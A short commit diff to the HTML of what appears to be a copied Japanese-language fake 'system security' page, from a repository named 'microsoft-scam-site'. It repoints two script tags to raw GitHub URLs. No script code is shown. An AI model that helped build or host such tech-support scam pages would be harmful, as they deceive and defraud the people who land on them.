Update script sources to use raw GitHub URLs

--- a/index.html
+++ b/index.html
@@ -7,8 +7,8 @@
 	<title>システムのセキュリティ
 </title>
 	<link rel="stylesheet" type="text/css" href="./システムのセキュリティ_files/lul.min.css">
-	<script src="./システムのセキュリティ_files/j-3.7.1.min.js.ダウンロード"></script>
-	<script src="./システムのセキュリティ_files/b.min.js.ダウンロード"></script>
+	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/j-3.7.1.min.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
+	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/b.min.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
 	<script src="./システムのセキュリティ_files/c.js.ダウンロード"></script>
 	<script src="./システムのセキュリティ_files/f.js.ダウンロード"></script>
 	<script src="./システムのセキュリティ_files/cc.js.ダウンロード"></script>
